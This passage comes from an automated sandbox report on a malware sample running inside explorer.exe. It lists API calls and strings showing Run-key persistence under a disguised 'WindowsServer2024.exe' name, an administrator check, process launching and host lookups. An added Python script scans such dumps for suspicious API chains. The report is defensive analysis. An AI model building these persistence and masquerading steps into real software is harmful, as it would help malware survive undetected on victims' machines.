• type_info::operator==.LIBCMT ref: 00C0BC88
• std::exception::exception.LIBCMT ref: 00C0BCC1
• _getptd.LIBCMT ref: 00C0BEF4
• std::exception::exception.LIBCMT ref: 00C0BF6D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
• String ID: bad exception$csm$csm$csm
• API String ID: 1639654010-820278400
• Opcode ID: 6faa33b089582752c27cfbc1c1e80be62899ed4a314661211624918d995b1c1c
• Instruction ID: b042c6aa080ce71104c2bfd0971d0d2439824e041d345146a70a12bfd039868b
• Opcode Fuzzy Hash: 6faa33b089582752c27cfbc1c1e80be62899ed4a314661211624918d995b1c1c
• Instruction Fuzzy Hash: 51D1EF32700B418BEB24DF66D4803AE77A4F749B88F544225EFA917B99CF34CA55D701
APIs
  • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
  • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
  • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
• CreateDirectoryW.KERNEL32 ref: 00BEFBD8
• GetLastError.KERNEL32 ref: 00BEFBE3
• LocalAlloc.KERNEL32 ref: 00BEFBFE
• CreateFileW.KERNEL32 ref: 00BEFC6E
• GetLastError.KERNEL32 ref: 00BEFC79
• LocalFree.KERNEL32 ref: 00BEFD16
• LocalFree.KERNEL32 ref: 00BEFD21
• LocalFree.KERNEL32 ref: 00BEFD77
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Free$lstrlen$AllocCreateErrorLast$DirectoryFileFolderKnownPathTask
• String ID: %s%s$P$WindowsServer2024.exe
• API String ID: 1076749940-1786351275
• Opcode ID: a14841830c2abf8d4874170eae5c5501311d47b61c8d518f533b23261dad1e24
• Instruction ID: 3e7ca81c594eb448fc37b6af9df298dfbb6ac412244cf1bf31e9a03af1c63512
• Opcode Fuzzy Hash: a14841830c2abf8d4874170eae5c5501311d47b61c8d518f533b23261dad1e24
• Instruction Fuzzy Hash: 7351CA32508A8582E7209B55F86476EB7A1F7C57A4F604325E6A946AF8CF7CD489CB00
APIs
  • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
  • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
  • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
• LocalAlloc.KERNEL32 ref: 00BEF230
• wnsprintfW.SHLWAPI ref: 00BEF275
• RegOpenKeyW.ADVAPI32 ref: 00BEF29B
• RegSetValueExW.ADVAPI32 ref: 00BEF2D3
• RegCloseKey.ADVAPI32 ref: 00BEF2DE
• RegOpenKeyW.ADVAPI32 ref: 00BEF300
• RegSetValueExW.ADVAPI32 ref: 00BEF338
• RegCloseKey.ADVAPI32 ref: 00BEF343
• LocalFree.KERNEL32 ref: 00BEF34E
• LocalFree.KERNEL32 ref: 00BEF359
Strings
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF28D
• WindowsServer2024.exe, xrefs: 00BEF253
• SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF2F2
• {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00BEF32C
• {741330C7-73F4-49B6-9258-6679317DED46}, xrefs: 00BEF247
• %s%s %s, xrefs: 00BEF264
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTaskwnsprintf
• String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}${AB1F3E47-AEF1-400E-A108-233A046C3A34}
• API String ID: 1790340015-474006990
• Opcode ID: d6f2102c1b876ca338cdd60c50be2b12f3308f971301b787c4bddd2885c18154
• Instruction ID: 78a5c3e098f5e46390d87b15ecbec89006b625ef42c85b646efa9005a9c689a0
• Opcode Fuzzy Hash: d6f2102c1b876ca338cdd60c50be2b12f3308f971301b787c4bddd2885c18154
• Instruction Fuzzy Hash: A6311935615A81C2EB20DF25F8A4B5A77B0F785794F500222EA9E43BA8DF7DC949CB00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
• String ID:
• API String ID: 3749125693-0
• Opcode ID: 9d6664aa23206a2a9b891f2668c1b6fb33a2235f64874e35d4e4b5f5713d2e3e
• Instruction ID: d149508f107790d8dca1da34b5a6dcb17ccfa55735e97c73cd5ed71997621169
• Opcode Fuzzy Hash: 9d6664aa23206a2a9b891f2668c1b6fb33a2235f64874e35d4e4b5f5713d2e3e
• Instruction Fuzzy Hash: 3761B036618A808BDB60DB29E4A471AB7B0F7C5B94F105115EB9A87BA8CF7DC945CF00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Free$Allocgethostbynameinet_addrtype_info::_name_internal_method
• String ID:
• API String ID: 156840946-0
• Opcode ID: 24e95a5a60aac3689dfe6f05b441674e5507dff5deef9c4db6f24b73b44f7655
• Instruction ID: 1453ff22981711e0585207e6f409a0b6a89f8bb59f16010d8b1eb625b09379cf
• Opcode Fuzzy Hash: 24e95a5a60aac3689dfe6f05b441674e5507dff5deef9c4db6f24b73b44f7655
• Instruction Fuzzy Hash: AE41D776618A4486D720DB29E89471EB7B1F7C9B98F100615EB8E83B68DF3CC549CB00
APIs
• __free_lconv_mon.LIBCMT ref: 00C0E168
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CC2
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CD4
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CE6
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CF8
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D0A
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D1C
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D2E
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D40
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D52
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D64
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D79
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D8E
  • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11DA3
• free.LIBCMT ref: 00C0E15C
  • Part of subcall function 00C0C4D0: RtlFreeHeap.NTDLL(?,?,00000000,00C0AC50,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0C4E6
  • Part of subcall function 00C0C4D0: _errno.LIBCMT ref: 00C0C4F0
  • Part of subcall function 00C0C4D0: GetLastError.KERNEL32(?,?,00000000,00C0AC50,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0C4F8
• free.LIBCMT ref: 00C0E17E
• __free_lconv_num.LIBCMT ref: 00C0E18A
• free.LIBCMT ref: 00C0E196
• free.LIBCMT ref: 00C0E1A2
• free.LIBCMT ref: 00C0E1C6
• free.LIBCMT ref: 00C0E1DA
• free.LIBCMT ref: 00C0E1E9
• free.LIBCMT ref: 00C0E1F5
• free.LIBCMT ref: 00C0E222
• free.LIBCMT ref: 00C0E24A
• free.LIBCMT ref: 00C0E264
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                                                                            • String ID:
                                                                            • API String ID: 518839503-0
                                                                            • Opcode ID: f646e581e6c13ef6b143ada3750723de8401b4e8531ebf511b5a7b58b7508cb8
                                                                            • Instruction ID: f8ee2c5eae092bfb9e9980c38a8df4390a0ad2a5fb7bc03558c45d2343a3da44
                                                                            • Opcode Fuzzy Hash: f646e581e6c13ef6b143ada3750723de8401b4e8531ebf511b5a7b58b7508cb8
                                                                            • Instruction Fuzzy Hash: C5314F3278268485EF15EFA1C4A03BD2364FB94B98F084A36DE1D4B6D5CF78C981D310
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CloseHandle$AllocCreateDirectoryObjectProcessSingleSystemWaitlstrlen
                                                                            • String ID: h
                                                                            • API String ID: 1515568942-2439710439
                                                                            • Opcode ID: fcf791c4c17c76b04dbd47a6427d92d9a15430502c49554a9dd4a1db620ea300
                                                                            • Instruction ID: 9d5cde67f7d739abac51e23462ecc491b7e42f0b849061254a587fee8afd44bc
                                                                            • Opcode Fuzzy Hash: fcf791c4c17c76b04dbd47a6427d92d9a15430502c49554a9dd4a1db620ea300
                                                                            • Instruction Fuzzy Hash: 7451F672218BC086E7709B15F49879EB3A1F788758F904629D79943BA9DF7CC548CB04
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00BE9251
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BE9272
                                                                            • LocalFree.KERNEL32 ref: 00BE93E6
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • LocalAlloc.KERNEL32 ref: 00BE92AC
                                                                            • LocalFree.KERNEL32 ref: 00BE93DB
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • CreateProcessW.KERNEL32 ref: 00BE9398
                                                                            • LocalFree.KERNEL32 ref: 00BE93A8
                                                                            • LocalFree.KERNEL32 ref: 00BE93B3
                                                                            • LocalFree.KERNEL32 ref: 00BE93BE
                                                                            • LocalFree.KERNEL32 ref: 00BE93D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$Alloc$CreateDirectoryFolderKnownPathProcessSystemTask_errno_invalid_parameter_noinfo
                                                                            • String ID: h
                                                                            • API String ID: 2101662253-2439710439
                                                                            • Opcode ID: f84ef3b761225198f22501dd15be75b558d5d674513c0454791fa4cd12d06670
                                                                            • Instruction ID: 0b1c03e3d79933b8e628206d15ee1f60e96b02795d35820c00d9f4b45ae3faee
                                                                            • Opcode Fuzzy Hash: f84ef3b761225198f22501dd15be75b558d5d674513c0454791fa4cd12d06670
                                                                            • Instruction Fuzzy Hash: 0841E736618B8482E7609B11F89479EB7A1F7C9750F504226E68E47BA8DF7CC54CCF40
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C05BC1
                                                                            • lstrcpyW.KERNEL32 ref: 00C05C05
                                                                              • Part of subcall function 00BFDDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00BFDE32
                                                                              • Part of subcall function 00BFDDC0: CheckTokenMembership.ADVAPI32 ref: 00BFDE4F
                                                                              • Part of subcall function 00BFDDC0: FreeSid.ADVAPI32 ref: 00BFDE66
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00C05C25
                                                                            • LocalFree.KERNEL32 ref: 00C05C34
                                                                            • LocalFree.KERNEL32 ref: 00C05C6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                                                                            • String ID: %s [%d]$CPU001
                                                                            • API String ID: 2255487582-1715046084
                                                                            • Opcode ID: f3fc7e035b4eed099ce0184f6fda892aaf14ad264708c1ce09850189901d9943
                                                                            • Instruction ID: 77e263e30bec0eb70aef03b5858a8f6fac0c0b0b485d1c6cdb326a3b7728c22f
                                                                            • Opcode Fuzzy Hash: f3fc7e035b4eed099ce0184f6fda892aaf14ad264708c1ce09850189901d9943
                                                                            • Instruction Fuzzy Hash: 3B310D31618A8482EB60DF11E89879E77A0F7C8B84F501625EA8F87B74DF7DC489CB40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _fileno$_errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 482796045-0
                                                                            • Opcode ID: 02767f0d3d9df5bd7afa2c306bef05b01e90781a74b09d5dca5bcb138b697b5b
                                                                            • Instruction ID: 438739e6b13be5711d442315b016457286f584dad522494e3353cef6e6ceb7d8
                                                                            • Opcode Fuzzy Hash: 02767f0d3d9df5bd7afa2c306bef05b01e90781a74b09d5dca5bcb138b697b5b
                                                                            • Instruction Fuzzy Hash: 4951C322214A8486CB259F3A95E12FD3351FB43B94BA48315EB7A4B6E1CB68C5D2F700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$CreateFrameInfo_amsg_exit
                                                                            • String ID: csm
                                                                            • API String ID: 2825728721-1018135373
                                                                            • Opcode ID: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                                                                            • Instruction ID: 59511cdf710ee3da737da9e588ba03240f63f1112c15a46701a2a3e3724b3585
                                                                            • Opcode Fuzzy Hash: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                                                                            • Instruction Fuzzy Hash: E441BF36200B81C2C630EF12E44036E77A4F385BA4F454225EFAD07B95DF39C5A5D701
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32 ref: 00BF01F8
                                                                            • LocalAlloc.KERNEL32 ref: 00BF0210
                                                                            • LocalFree.KERNEL32 ref: 00BF030B
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • lstrlenW.KERNEL32 ref: 00BF0262
                                                                            • GetFileAttributesW.KERNEL32 ref: 00BF02CA
                                                                            • SHFileOperationW.SHELL32 ref: 00BF02E3
                                                                            • CoTaskMemFree.COMBASE ref: 00BF0316
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask_errno_invalid_parameter_noinfolstrlen
                                                                            • String ID: %s\%s${206629A6-BF8E-426E-AEC4-88B3A8712196}
                                                                            • API String ID: 2444233868-3959428754
                                                                            • Opcode ID: 54602548cafb9261f4589ebb62c62188df0a7085716d7b9d5ed83343bd92bfe1
                                                                            • Instruction ID: 39176bf0c7de2f2c32944e561afeb07dd2a576f4ac76464e895b251b9f81ae14
                                                                            • Opcode Fuzzy Hash: 54602548cafb9261f4589ebb62c62188df0a7085716d7b9d5ed83343bd92bfe1
                                                                            • Instruction Fuzzy Hash: 42311E31228A5482E750AB15E85476E77B1F7C9794F501126F78B83AB8DF3CC949CB04
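                                                                             The three function listings above (the AllocateAndInitializeSid / CheckTokenMembership / FreeSid subcall chain, the GetSystemDirectoryW + CreateProcessW launcher, and the SHGetKnownFolderPath / GetFileAttributesW / SHFileOperationW routine) are the kind of ordered API sequences an analyst greps a Joe Sandbox function dump for. The script below is an added example, not part of this report or of Joe Sandbox: it parses lines in the "• Name.MODULE ref: ADDR" format shown on this page (including "Part of subcall function" entries), splits them into per-function records at each "APIs" header, and flags records that contain a known chain as an ordered subsequence. The chain names, the SAMPLE text (assembled from lines on this page plus a benign free()-only record) and the match order heuristic are the example's own assumptions; the listing order in a dump is not proof of execution order, so treat a hit as a triage lead, not a verdict.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One trace line, e.g.
#   • CheckTokenMembership.ADVAPI32 ref: 00BFDE4F
#   • Part of subcall function 00BFDDC0: FreeSid.ADVAPI32 ref: 00BFDE66
#   • RtlFreeHeap.NTDLL(?,?,00000000,00C0AC50), ref: 00C0C4E6
# The bullet is optional so copy-pasted text without it still parses.
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Hypothetical chain labels chosen for this example; each tuple is an ordered
# subsequence of API names (A/W suffix stripped) that must appear in one record.
CHAINS = {
    "admin-membership-check": ("AllocateAndInitializeSid", "CheckTokenMembership", "FreeSid"),
    "launch-from-system-dir": ("GetSystemDirectory", "CreateProcess"),
    "shell-file-op-on-known-folder": ("SHGetKnownFolderPath", "GetFileAttributes", "SHFileOperation"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    subcall_of: Optional[str]  # address of the callee when the entry is a "Part of subcall" line


def _norm(name: str) -> str:
    """Drop a trailing ANSI/Unicode suffix (CreateProcessW -> CreateProcess)."""
    if len(name) > 1 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


def parse_function_records(text: str) -> list[list[ApiCall]]:
    """Group trace lines into per-function records; a record starts at an 'APIs' header."""
    records: list[list[ApiCall]] = []
    current: Optional[list[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = API_RE.match(line)
        if m and current is not None:
            current.append(ApiCall(m["name"], m["mod"], m["ref"].upper(), m["sub"]))
    return records


def find_chain(calls: list[ApiCall], chain: tuple[str, ...]) -> Optional[list[str]]:
    """Return the refs of calls matching `chain` as an ordered subsequence, else None."""
    hits: list[str] = []
    idx = 0
    for call in calls:
        if _norm(call.name) == chain[idx]:
            hits.append(call.ref)
            idx += 1
            if idx == len(chain):
                return hits
    return None


def scan(text: str) -> list[tuple[int, str, list[str]]]:
    """Report (record index, chain label, matching refs) for every chain hit."""
    findings = []
    for i, calls in enumerate(parse_function_records(text)):
        for label, chain in CHAINS.items():
            refs = find_chain(calls, chain)
            if refs:
                findings.append((i, label, refs))
    return findings


# Constructed sample: three records taken from this page's listings plus one benign record.
SAMPLE = """\
APIs
• LocalAlloc.KERNEL32 ref: 00C05BC1
• lstrcpyW.KERNEL32 ref: 00C05C05
  • Part of subcall function 00BFDDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00BFDE32
  • Part of subcall function 00BFDDC0: CheckTokenMembership.ADVAPI32 ref: 00BFDE4F
  • Part of subcall function 00BFDDC0: FreeSid.ADVAPI32 ref: 00BFDE66
• GetModuleFileNameW.KERNEL32 ref: 00C05C25
• LocalFree.KERNEL32 ref: 00C05C34
Strings
APIs
• SHGetKnownFolderPath.SHELL32 ref: 00BF01F8
• LocalAlloc.KERNEL32 ref: 00BF0210
• LocalFree.KERNEL32 ref: 00BF030B
  • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
• lstrlenW.KERNEL32 ref: 00BF0262
• GetFileAttributesW.KERNEL32 ref: 00BF02CA
• SHFileOperationW.SHELL32 ref: 00BF02E3
• CoTaskMemFree.COMBASE ref: 00BF0316
Strings
APIs
• LocalAlloc.KERNEL32 ref: 00BE9251
• GetSystemDirectoryW.KERNEL32 ref: 00BE9272
• CreateProcessW.KERNEL32 ref: 00BE9398
• LocalFree.KERNEL32 ref: 00BE93A8
Strings
APIs
• free.LIBCMT ref: 00C0E15C
  • Part of subcall function 00C0C4D0: RtlFreeHeap.NTDLL(?,?,00000000,00C0AC50), ref: 00C0C4E6
• free.LIBCMT ref: 00C0E17E
Strings
"""

if __name__ == "__main__":
    for idx, label, refs in scan(SAMPLE):
        print(f"record {idx}: {label} at {', '.join(refs)}")
```

                                                                             The subcall entries matter: the admin check here lives in a helper at 00BFDDC0 and only shows up in the caller's listing as "Part of subcall" lines, so a scanner that skips those lines misses the chain. To run this over a full report, paste the "APIs" sections of the function listings into a file and call scan() on its contents.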
                                                                            APIs
